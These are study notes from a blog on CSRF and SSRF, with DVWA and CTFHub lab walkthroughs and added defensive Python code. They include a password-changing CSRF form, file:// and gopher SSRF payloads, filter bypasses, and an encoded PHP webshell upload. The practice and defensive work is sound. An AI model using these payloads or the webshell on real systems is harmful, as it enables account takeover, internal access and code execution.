CSRF and SSRF study notes

CSRF

  • CSRF, full name Cross-site request forgery
  1. CSRF attack process
  • The target user has logged in to the website and can use the website's functions
  • The target user opens the payload constructed by the attacker
  2. The reason for the vulnerability
  • There is no effective secondary verification and no token verification
  3. The DVWA range has different levels
  • LOW
  • Going in, I find that you only need to enter the new password and confirm it to change the account's password, and F12 did not show any token verification.
  • Capture the request directly, use Burp Suite to generate the CSRF file, and put it in the web root. My current password is 123456
<html>
 <!-- CSRF PoC - generated by Burp Suite Professional -->
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/">
     <input type="hidden" name="password&#95;new" value="888888" />
     <input type="hidden" name="password&#95;conf" value="888888" />
     <input type="hidden" name="Change" value="Change" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
  • When I open csrf.html and click Submit request, the browser sends my session cookie with the form because I am logged in to the account
  • The web application then directly changes the password of the account I am logged in to
  • The Medium level is no different from Low
  • When capturing packets at High, you need to change the level to low in Burp Suite
  • Impossible cannot be exploited because it requires secondary verification of the user's current password, and the password cannot be changed without knowing the current password
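The Low-level handler has no token, which is exactly why the Burp PoC above works. As an added example (not DVWA's code and not from the original notes), here is a Python sketch of that vulnerable check next to a hardened one that adds an Origin check, a per-session synchronizer token and the current-password check the Impossible level relies on. The field name csrf_token, the attacker origin and the session dict are assumptions for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed: the origin DVWA is served from in the notes; a form posted from any other origin is cross-site.
SITE_ORIGIN = "http://127.0.0.1"

# The hidden fields from the Burp-generated PoC above; note there is no token field at all.
POC_FORM = {"password_new": "888888", "password_conf": "888888", "Change": "Change"}


def issue_csrf_token(session):
    """Per-session random token the server embeds in its own form (field name assumed: csrf_token)."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def change_password_low(session, form):
    """The Low-level logic from the notes: the two new-password fields only have to match."""
    new = form.get("password_new")
    if not new or new != form.get("password_conf"):
        return False, "passwords do not match"
    session["password"] = new
    return True, "password changed"


def request_is_same_origin(headers):
    """Origin (or Referer as a fallback) must equal our scheme://host exactly; a prefix test
    would let http://127.0.0.1.attacker.example through."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def change_password_hardened(session, form, headers):
    """Three checks before the change: same origin, a valid anti-CSRF token (compared in constant
    time), and the current password, which is the secondary verification the Impossible level adds."""
    if not request_is_same_origin(headers):
        return False, "cross-site request rejected"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"
    if form.get("password_current") != session.get("password"):
        return False, "current password incorrect"
    ok, msg = change_password_low(session, form)
    if ok:
        session.pop("csrf_token", None)  # single-use token: a replayed form needs a fresh one
    return ok, msg


if __name__ == "__main__":
    victim = {"password": "123456"}
    print("low:", change_password_low(victim, POC_FORM), victim["password"])
    victim = {"password": "123456"}
    print("hardened vs PoC:", change_password_hardened(victim, POC_FORM, {"Origin": "http://attacker.example"}))
    legit = dict(POC_FORM, csrf_token=issue_csrf_token(victim), password_current="123456")
    print("hardened, real form:", change_password_hardened(victim, legit, {"Origin": SITE_ORIGIN}))
```

The PoC form fails the hardened handler twice over: its Origin is the attacker's page, and even if it were posted from the right origin it carries no token. Rejecting requests with neither Origin nor Referer is a strict choice; it is the safe default for a state-changing POST.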

SSRF

  • SSRF, full name Server Side Request Forgery
  • SSRF vulnerability principle: the server provides a function that fetches data from other server applications and does not restrict or filter the target address.
  • Main attack methods
    1. Port-scan the external network, the internal network where the server sits, and the local ports to obtain banner information of some services
    2. Attack applications running on the intranet or locally
    3. Fingerprint intranet web applications to identify asset information inside the enterprise
    4. Attack web applications on the internal and external networks, mainly attacks that can be carried out with HTTP GET requests
    5. Use the file protocol to read local files, etc.
  • I practised SSRF on CTFHub

Intranet access

  • Try to access flag.php located at 127.0.0.1
  • Add /?url=http://127.0.0.1/flag.php directly to the URL
  • You get the flag

Pseudo-protocol to read files

  • Pseudo-protocols were discussed many times in a previous article
  • Accessing /?url=http://127.0.0.1/flag.php directly, as in the task
  • The page returned ???
  • The topic is pseudo-protocols, so we use the file pseudo-protocol to read it: /?url=file:///var/www/html/flag.php

Port scan

  • The task has already hinted that the port range is 8000-9000
  • Brute-force the range and it's done
  • Send the hit to the Repeater to get the flag.

Gopher protocol learning

  • Gopher is an information lookup system on the Internet; it organises files on the Internet into an index and takes users from one place on the Internet to another.
  • The Gopher protocol supports sending GET and POST requests: you can first intercept a GET request packet and a POST request packet and turn them into a request that conforms to the gopher protocol
  • The Gopher protocol can attack Redis, MySQL, FastCGI, FTP, etc. on the intranet, and can also send GET and POST requests.
  • The format of the Gopher protocol
    URL: gopher://<host>:<port>/<gopher-path>_ followed by the TCP data stream

CTFHUP: POST request

  • I studied this problem all afternoon
  • hint: This time send an HTTP POST request. By the way, the SSRF is implemented with PHP's curl, and it will follow 302 jumps. Come on, Sao Nian
  • Access http://challenge-527e8656f5239cf0.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
  • It returns an input box without even a submit button (you can build the front end yourself)
  • But we can read the file's source code through the file protocol
// index.php file
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>

// flag.php
<?php
error_reporting(0);
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}
$flag=getenv("CTFHUB");
$key = md5($flag);
if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>
  • If you submit the key value directly on the flag.php page, it returns Just View From 127.0.0.1, because the POST you send does not come from the intranet: it comes from the address you are visiting from now, and this file can only be reached from the intranet
  • So we have to think about how to access it through the intranet
  • The Gopher protocol we mentioned above shows its use here.
  • First, we capture the packet when submitting the key value
  • After capturing the packet, we extract the information we need and prepare to construct the payload
  • It must contain the following content
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e51d59854bfe930e0bf1e608691914f6
  • What we have to do is pass this POST request in through ?url=127.0.0.1/index.php
  • The payload constructed above is URL-encoded. Here you need to pay attention to changing the URL encoding of the line break from %0A to %0D%0A
  • After three rounds of encoding, the following payload is obtained:
POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253De51d59854bfe930e0bf1e608691914f6
  • Combine payload and url
/?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253De51d59854bfe930e0bf1e608691914f6
  • Get the flag
  • Later I asked a senior at school: you can actually encode only twice and submit ?url=gopher://... directly. Tried it and it works!!!!
  • Two encodings are needed because the URL is decoded once by the server itself and once more by gopher.
  • Three encodings are needed for the nested version because the request passes through index.php twice (one URL decode each) before gopher decodes it once.
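To see why the number of encoding rounds matters from the other side, here is an added Python example (my own, not from the original notes) that peels percent-encoding layer by layer from the triple-encoded payload above. It shows what a log review or WAF-style check has to do before it can recognise the smuggled POST request: decode until the value stops changing, then look for disallowed schemes, CRLF sequences and a chained url= parameter. The payload string is the one from the notes; the findings format and the five-layer limit are my choices.

```python
from urllib.parse import unquote

# Constructed from the notes: the POST request for flag.php after three rounds of URL encoding.
TRIPLE_ENCODED = (
    "POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1"
    "%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded"
    "%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D"
    "e51d59854bfe930e0bf1e608691914f6"
)
# Schemes curl speaks that an HTTP "fetch this URL" feature never needs (all mentioned in the notes).
DISALLOWED_SCHEMES = ("gopher://", "file://", "ftp://")


def peel_url_encoding(value, max_layers=5):
    """Percent-decode until the string stops changing and report how many layers came off.
    Each hop in the notes' chain (outer index.php, inner index.php, curl's gopher handler)
    strips one layer, so a check that decodes only once never sees the real request."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def inspect_url_parameter(value):
    """Findings a request-log review or WAF rule would raise for a single url= value."""
    decoded, layers = peel_url_encoding(value)
    lowered = decoded.lower()
    findings = []
    if layers > 1:
        findings.append(f"nested-encoding:{layers}")
    for scheme in DISALLOWED_SCHEMES:
        if scheme in lowered:
            findings.append("scheme:" + scheme.rstrip(":/"))
    if "\r\n" in decoded or "\n" in decoded:
        findings.append("crlf")          # raw request lines smuggled inside a URL
    if "url=" in lowered:
        findings.append("chained-url")   # the parameter feeds the same endpoint again
    return findings


if __name__ == "__main__":
    decoded, layers = peel_url_encoding(TRIPLE_ENCODED)
    print(f"{layers} layers removed:\n{decoded!r}")
    chained = "127.0.0.1/index.php?url=gopher://127.0.0.1:80/_" + TRIPLE_ENCODED
    print(inspect_url_parameter(chained))
    print(inspect_url_parameter("http://example.com/page?q=a%20b"))
```

Decoding to a fixed point is deliberately aggressive: a legitimate value that really contains a literal %41 will be over-decoded, which is acceptable for a detection rule but not for the fetcher itself.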

CTFHUB:UPLOAD

  • The same GET ?url=127.0.0.1/flag.php; this time it is a file upload
  • There is no submit button, so construct one yourself: <input type="submit" name="submit">
  • After submitting, it is the same as the task above: Just View From 127.0.0.1
  • It's another problem that needs to reach the target through the intranet
  • Read the source code
    ?url=file:///var/www/html/flag.php. In some tasks the PHP is mixed with the page's HTML.
 // flag.php
 <?php
 error_reporting(0);
 if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
     echo "Just View From 127.0.0.1";
     return;
 }
 if (isset($_FILES["file"]) && $_FILES["file"]["size"] > 0) {
     echo getenv("CTFHUB");
     exit;
 }
 ?>
 Upload Webshell
 <form action="/flag.php" method="post" enctype="multipart/form-data">
 <input type="file" name="file">
 </form>
// index.php
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
    
    
    header("Location: /?url=_");
    exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
  • This task does not really require you to upload a webshell; as long as you upload any file to flag.php at 127.0.0.1 it works.
  • Capture a packet as in the task above to get the information needed to build the payload
gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520328%250D%250ACache-Control%253A%2520max-age%253D0%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AOrigin%253A%2520http%253A//challenge-03512614d3fa8330.sandbox.ctfhub.com%253A10080%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundaryraDVcM1y9juGcBJu%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/86.0.4240.198%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AReferer%253A%2520http%253A//challenge-03512614d3fa8330.sandbox.ctfhub.com%253A10080/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250AConnection%253A%2520close%250D%250A%250D%250A------WebKitFormBoundaryraDVcM1y9juGcBJu%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522shell.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%250D%250Aeval%2528%2524_POST%255Bwhoami%255D%2529%253B%250D%250A%253F%253E%250D%250A------WebKitFormBoundaryraDVcM1y9juGcBJu%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%250D%250A------WebKitFormBoundaryraDVcM1y9juGcBJu--%250D%250A

CGI and FastCGI protocol

  • CGI and FastCGI protocol learning
  • The web page I studied from is recorded above and is very detailed
  • Below I will record the part about the FastCGI protocol to make my own review easier. It is very theoretical and hard to read.
  1. Overview: FastCGI is a communication protocol. In the CGI protocol, the life cycle of a web application depends entirely on the life cycle of the HTTP request; a FastCGI process is resident: once started, it can handle all HTTP requests without exiting after each one.
  2. The composition of the FastCGI protocol
  • Message header information
- Version: the FastCGI protocol version number.
- Type: the type of the FastCGI message, which determines how the message is handled.
- RequestID: identifies the FastCGI request the message belongs to.
- Content Length: the number of bytes in the packet body.
  • Message type definitions
- BEGIN_REQUEST: sent from the web server to the web application to start processing a new request.
- ABORT_REQUEST: sent from the web server to the web application to abort a request in progress; for example, it is triggered when the user presses the browser's "stop" button after sending a request.
- END_REQUEST: sent from the web application to the web server to signal that the request is complete. The returned packet contains a "return code" that indicates whether the request was processed successfully.
- PARAMS: a "stream packet" sent from the web server to the web application; several packets can be sent. The end of the stream is signalled by the web server sending an empty packet of length 0. The data in PARAMS has the same type as in the CGI protocol, i.e. the system environment we read through $_SERVER.
- STDIN: a "stream packet" from which the web application reads the POST data submitted by the user.
- STDOUT: a "stream packet" written by the web application to standard output, containing the data returned to the user.
  3. Web server and FastCGI interaction process
  • The Web server accepts the user's request, but the request is ultimately processed by the Web application. The Web server connects to the FastCGI process through a socket
  • The FastCGI process sees the incoming connection and chooses to accept or reject it. If it accepts the connection, it reads the packets from the standard input stream
  • If the connection is not accepted within the time the FastCGI process specifies, the request fails. Otherwise, the Web server sends a BEGIN_REQUEST message containing a unique RequestID to the FastCGI process; all subsequent packets carry this RequestID. Then the Web server sends any number of PARAMS messages to the FastCGI process. Once the transmission is complete, the Web server sends an empty PARAMS packet and closes the stream. In addition, if the user sent POST data, the Web server writes it to standard input (STDIN) and sends it to the FastCGI process; when all POST data has been sent, an empty standard input (STDIN) packet closes the stream.
  • Meanwhile, the FastCGI process receives the BEGIN_REQUEST packet. It can reject the request by responding with END_REQUEST, or accept and process it. If it accepts, the FastCGI process waits to receive all PARAMS and standard input packets. Then the request is processed and the result is written to the standard output (STDOUT) stream. When processing is complete, it sends an empty packet on standard output to close the stream, and sends an END_REQUEST message to notify the Web server whether an error occurred.
    The above content comes from the URL given above.
    There is also a supplementary FastCGI architecture diagram and flow there.
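An added Python example (my own, not from the notes or the page they cite) that builds the request sequence described above (BEGIN_REQUEST, PARAMS, empty PARAMS, empty STDIN) with the record layout from the FastCGI specification and parses it back. The record-type numbers, the paddingLength and reserved header bytes, and the BEGIN_REQUEST and END_REQUEST body layouts come from the specification rather than the notes; the sample parameters are constructed.

```python
import struct

FCGI_VERSION_1 = 1
FCGI_RESPONDER = 1
# Record types from the FastCGI specification; the notes describe the first six.
FCGI_TYPES = {1: "BEGIN_REQUEST", 2: "ABORT_REQUEST", 3: "END_REQUEST",
              4: "PARAMS", 5: "STDIN", 6: "STDOUT", 7: "STDERR"}
# Header: version, type, requestId, contentLength, paddingLength, reserved byte.
# (paddingLength and the reserved byte are spec fields the notes do not list.)
HEADER = struct.Struct(">BBHHBx")


def pack_record(rtype, request_id, body=b""):
    """One record: 8-byte header, body, then zero padding up to an 8-byte boundary."""
    padding = (8 - len(body) % 8) % 8
    return HEADER.pack(FCGI_VERSION_1, rtype, request_id, len(body), padding) + body + b"\0" * padding


def encode_name_value(name, value):
    """Name-value pair as used in PARAMS: a length below 128 takes one byte,
    a longer one takes four bytes with the top bit set."""
    out = b""
    for length in (len(name), len(value)):
        out += bytes([length]) if length < 128 else struct.pack(">I", length | 0x80000000)
    return out + name + value


def build_request(request_id, params, stdin=b""):
    """The web-server side of the flow in the notes: BEGIN_REQUEST, the PARAMS stream
    closed by an empty PARAMS record, then STDIN closed by an empty STDIN record."""
    begin_body = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags (0 = close after request), reserved
    params_body = b"".join(encode_name_value(k.encode(), v.encode()) for k, v in params.items())
    records = [pack_record(1, request_id, begin_body),
               pack_record(4, request_id, params_body),
               pack_record(4, request_id)]
    if stdin:
        records.append(pack_record(5, request_id, stdin))
    records.append(pack_record(5, request_id))
    return b"".join(records)


def parse_records(data):
    """Split a byte stream into (type_name, request_id, body) tuples, skipping padding;
    a truncated stream or an unknown version raises ValueError instead of being guessed at."""
    records, offset = [], 0
    while offset < len(data):
        if len(data) - offset < HEADER.size:
            raise ValueError("truncated record header")
        version, rtype, rid, clen, plen = HEADER.unpack_from(data, offset)
        if version != FCGI_VERSION_1:
            raise ValueError(f"unsupported FastCGI version {version}")
        start = offset + HEADER.size
        body = data[start:start + clen]
        if len(body) != clen:
            raise ValueError("truncated record body")
        records.append((FCGI_TYPES.get(rtype, f"UNKNOWN({rtype})"), rid, body))
        offset = start + clen + plen
    return records


def parse_params(body):
    """Decode a PARAMS body back into a dict (the values PHP exposes through $_SERVER)."""
    params, pos = {}, 0
    while pos < len(body):
        lengths = []
        for _ in range(2):
            if body[pos] < 128:
                lengths.append(body[pos])
                pos += 1
            else:
                lengths.append(struct.unpack_from(">I", body, pos)[0] & 0x7FFFFFFF)
                pos += 4
        name = body[pos:pos + lengths[0]]
        pos += lengths[0]
        value = body[pos:pos + lengths[1]]
        pos += lengths[1]
        params[name.decode()] = value.decode()
    return params


def parse_end_request(body):
    """END_REQUEST body: appStatus (the application's exit code) and protocolStatus (0 = request complete)."""
    app_status, protocol_status = struct.unpack(">IB3x", body)
    return app_status, protocol_status


if __name__ == "__main__":
    # Constructed sample: a GET for the index.php path used throughout the notes.
    stream = build_request(1, {"REQUEST_METHOD": "GET", "SCRIPT_FILENAME": "/var/www/html/index.php"})
    for kind, rid, body in parse_records(stream):
        print(kind, rid, parse_params(body) if kind == "PARAMS" and body else f"{len(body)} bytes")
```

The parser is the piece a monitoring tap on the FastCGI socket would need: every record carries its own length, so a stream can be walked without knowing PHP's side of the conversation, and an empty PARAMS or STDIN record is visible as the stream-close marker the notes describe.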

CTFHUB:FastCGI

  • Learn again tomorrow!

CTFHUB: Redis

CTFHUB:URL Bypass

  • hint: http://notfound.ctfhub.com must be included in the requested URL. Try to use some special parts of the URL to bypass this restriction.
  • Let me show everyone a magical thing
  • Visiting the http://www.baidu.com@www.4399.com page jumps to the 4399 site
  • Then for this question, we can also use this URL-parsing problem
  • Accessing ?url=127.0.0.1/flag.php directly displays the content of the hint
  • So change the URL to ?url=http://notfound.ctfhub.com@127.0.0.1/flag.php to get the flag
  • The following is an explanation of the principle
  • In some cases, the back-end program parses the requested URL and filters on the parsed host. Improper parsing of the URL can then be used to bypass the filter.
    http://www.baidu.com@www.4399.com
    When the back-end's regular-expression filtering is not rigorous enough, for example when everything from http to com, i.e. www.baidu.com, is taken to be the host of the request, parsing the URL above will very likely conclude that its host is www.baidu.com, when in fact the content requested by this URL is on www.4399.com.

CTFHUB: Digital IP Bypass

  • hint: This time 127 and 172 are banned. Dotted-decimal IPs cannot be used. But you still have to visit 127.0.0.1. What can we do about it?
  • Visiting /?url=127.0.0.1/flag.php again just returns the ban message
  • Can't access it in decimal, so what about octal or hexadecimal?
  • /?url=0x7f.0x1/flag.php
  • A supplement: originally it should be 0x7f.0x0.0x0.0x1/flag.php, but 127.0.0.1 can be shortened to 127.1

CTFHUB: 302 Jump Bypass

  • hint: There is a very important point in SSRF that the request may follow 302 jump, try to use this to bypass the detection of IP and visit flag.php located at 127.0.0.1.
  • Why do I get the flag when I enter ?url=127.0.0.1/flag.php directly?
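The principle stated in the SSRF section (the server does not restrict the target address) and the three bypasses in the CTFHub tasks above (user@host in the URL, the 0x7f.0x1 and 127.1 numeric forms, and a 302 hop to 127.0.0.1) all defeat a filter that only looks at the text of the URL. As an added example (my own, not from the notes or the challenge code), here is a Python validator that instead checks where a fetch would actually connect: a scheme allow-list, the host taken from the parsed URL, shorthand numeric IPs normalised through inet_aton, names resolved and tested with ipaddress, and redirects followed one hop at a time with the same check on each hop. The fake DNS and HTTP tables, the 93.184.216.34 address and the flag text are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher://, ftp:// and friends are refused outright
MAX_REDIRECTS = 3

# Constructed stand-ins for DNS and HTTP so the example runs offline;
# 93.184.216.34 is only a public-looking address for the fake records.
FAKE_DNS = {"notfound.ctfhub.com": "93.184.216.34"}
FAKE_HTTP = {
    "http://notfound.ctfhub.com/index.html": (200, None, "public page"),
    "http://notfound.ctfhub.com/go": (302, "http://127.0.0.1/flag.php", ""),  # the 302-jump trick
    "http://127.0.0.1/flag.php": (200, None, "flag{constructed}"),
}


def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return FAKE_DNS[host]


def fake_fetch(url):
    return FAKE_HTTP.get(url, (404, None, ""))


def numeric_ipv4(host):
    """inet_aton accepts the shorthand a text filter on '127.' misses: 127.1, 0x7f.0x1, 0177.0.0.1, 2130706433."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def destination_ip(url, resolve=socket.gethostbyname):
    """Return the address a fetch would really connect to, or raise ValueError saying why the URL is refused."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname  # userinfo and port are stripped: http://a.com@127.0.0.1/ gives 127.0.0.1
    if not host:
        raise ValueError("no host in URL")
    try:
        ip = ipaddress.ip_address(host)          # canonical IPv4/IPv6 literal
    except ValueError:
        ip = numeric_ipv4(host)                  # shorthand numeric form
        if ip is None:
            try:
                ip = ipaddress.ip_address(resolve(host))   # otherwise resolve the name
            except OSError as exc:               # socket.gaierror is an OSError
                raise ValueError(f"cannot resolve {host}: {exc}") from None
    if not ip.is_global:                         # loopback, private, link-local, unspecified, ...
        raise ValueError(f"{host} -> {ip} is not a public address")
    return ip


def safe_fetch(url, fetch, resolve):
    """Follow redirects by hand so every hop is validated; curl's CURLOPT_FOLLOWLOCATION in the notes validates none."""
    for _ in range(MAX_REDIRECTS + 1):
        destination_ip(url, resolve)
        status, location, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)
            continue
        return body
    raise ValueError("too many redirects")


def check(url):
    """One-line verdict, used to run the bypass attempts from the notes through the validator."""
    try:
        return f"allowed: {safe_fetch(url, fake_fetch, fake_resolve)!r}"
    except ValueError as exc:
        return f"blocked: {exc}"


if __name__ == "__main__":
    for candidate in ["http://notfound.ctfhub.com/index.html",
                      "file:///var/www/html/flag.php",
                      "gopher://127.0.0.1:80/_",
                      "http://notfound.ctfhub.com@127.0.0.1/flag.php",
                      "http://0x7f.0x1/flag.php", "http://127.1/flag.php",
                      "http://notfound.ctfhub.com/go"]:
        print(f"{candidate:50} {check(candidate)}")
```

One caveat the DNS rebinding task title hints at: the resolve step here and the connection a real fetcher opens are two separate lookups, so a name that answers differently the second time can still slip through; a production fetcher pins the validated IP for the connection it opens.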

CTFHUB: DNS rebinding Bypass


Origin blog.csdn.net/CyhDl666/article/details/113541983